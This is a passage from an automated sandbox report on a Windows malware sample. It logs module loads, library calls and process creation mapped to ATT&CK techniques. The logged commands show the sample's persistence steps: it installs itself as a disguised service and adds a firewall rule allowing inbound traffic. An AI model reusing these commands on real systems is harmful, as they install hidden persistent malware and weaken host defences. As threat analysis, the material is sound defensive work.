6f540000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"USER32.DLL\" at base 75440000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"ADVAPI32.DLL\" at base 77010000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"SHELL32.DLL\" at base 76020000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"OLEAUT32.DLL\" at base 76f70000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"MSVCR100.DLL\" at base 6a160000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"NTDLL.DLL\" at base 77170000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"OLE32.DLL\" at base 76e10000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f70000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e80000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"PROPSYS.DLL\" at base 73b70000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"COMCTL32.DLL\" at base 73f40000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"APPHELP.DLL\" at base 74f20000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"CLBCATQ.DLL\" at base 753b0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a350000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 772e0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"SETUPAPI.DLL\" at base 75e80000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"RPCRT4.DLL\" at base 75940000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73b70000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"NTMARTA.DLL\" at base 744e0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 758d0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"PROFAPI.DLL\" at base 75090000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75150000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75510000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"SECUR32.DLL\" at base 74db0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 750a0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f20000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70460000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 772e0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"qoxyhdso.exe\" loaded module \"KERNEL32.DLL\" at base 772e0000\n \"qoxyhdso.exe\" loaded module \"WS2_32.DLL\" at base 76c70000\n \"qoxyhdso.exe\" loaded module \"DBGHELP.DLL\" at base 6f540000\n \"qoxyhdso.exe\" loaded module \"USER32.DLL\" at base 75440000\n \"qoxyhdso.exe\" loaded module \"ADVAPI32.DLL\" at base 77010000\n \"qoxyhdso.exe\" loaded module \"SHELL32.DLL\" at base 76020000\n \"qoxyhdso.exe\" loaded module \"OLEAUT32.DLL\" at base 76f70000\n \"qoxyhdso.exe\" loaded module \"MSVCR100.DLL\" at base 6a160000\n \"qoxyhdso.exe\" loaded module \"SSPICLI.DLL\" at base 74f00000\n \"qoxyhdso.exe\" loaded module \"RPCRT4.DLL\" at base 75940000\n \"qoxyhdso.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 758d0000\n \"qoxyhdso.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f20000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70460000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 772e0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6d420000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6cdc0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 772e0000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6bb70000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 69f50000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69ef0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 772e0000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6b640000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69d70000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 69eb0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6a210000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a200000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a1e0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69620000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68250000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75940000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 64e40000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6cdd0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 695f0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 681e0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 69ea0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 64c40000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76e10000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f70000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e80000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74a80000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 75440000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 753b0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bf60000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 77010000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 758d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 758d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 758d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 758d0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74810000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75010000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6fd70000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75120000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74650000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74750000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76f70000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70460000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 772e0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 733d0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 732e0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73700000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72fd0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 758d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72ef0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a40000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74900000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72fc0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 76c70000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75940000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73300000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71710000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74f00000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 758d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 745a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e2f6a@ADVAPI32.dll\"\n \"0e000f00703f2f6a@ADVAPI32.dll\"\n \"0e000f00cc3f2f6a@ADVAPI32.dll\"\n \"11001200b4472f6a@ADVAPI32.dll\"\n \"1100120048482f6a@ADVAPI32.dll\"\n \"120013008c482f6a@ADVAPI32.dll\"\n \"12001300e4482f6a@ADVAPI32.dll\"\n \"14001500dc6f2f6a@ADVAPI32.dll\"\n \"14001500f46f2f6a@ADVAPI32.dll\"\n \"140015000c702f6a@ADVAPI32.dll\"\n \"1700180024702f6a@ADVAPI32.dll\"\n \"0d000e003c702f6a@ADVAPI32.dll\"\n \"110012004c702f6a@ADVAPI32.dll\"\n \"1100120060702f6a@ADVAPI32.dll\"\n \"0d000e0034492f6a@SHELL32.dll\"\n \"0d000e00b0492f6a@SHELL32.dll\"\n \"0f001000a0712f6a@ADVAPI32.dll\"\n \"14001500e0712f6a@ADVAPI32.dll\"\n \"14001500f8712f6a@ADVAPI32.dll\"\n \"0c000d0040722f6a@ADVAPI32.dll\"\n \"0c000d0050722f6a@ADVAPI32.dll\"\n \"0e000f0060722f6a@ADVAPI32.dll\"\n \"0e000f0070722f6a@ADVAPI32.dll\"\n \"0b000c0080722f6a@ADVAPI32.dll\"\n \"14001500b4732f6a@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005996)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005772)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005772)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005772)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005772)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005964)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005964)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005964)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005964)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004252)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003080)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003080)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003960)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003960)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005996)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\yucmtnpt\\ (UID: 00000000-00005772)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\yucmtnpt\\\" - (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\qoxyhdso.exe\" %WINDIR%\\system32\\yucmtnpt\\\" - (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create yucmtnpt binPath= \"%WINDIR%\\system32\\yucmtnpt\\qoxyhdso.exe /d\\\"C:\\870b052420242560141194c487\" - (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description yucmtnpt \"wifi internet conection\"\" - (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start yucmtnpt\" - (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005996)\n \"qoxyhdso.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004252)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000\n \"qoxyhdso.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called 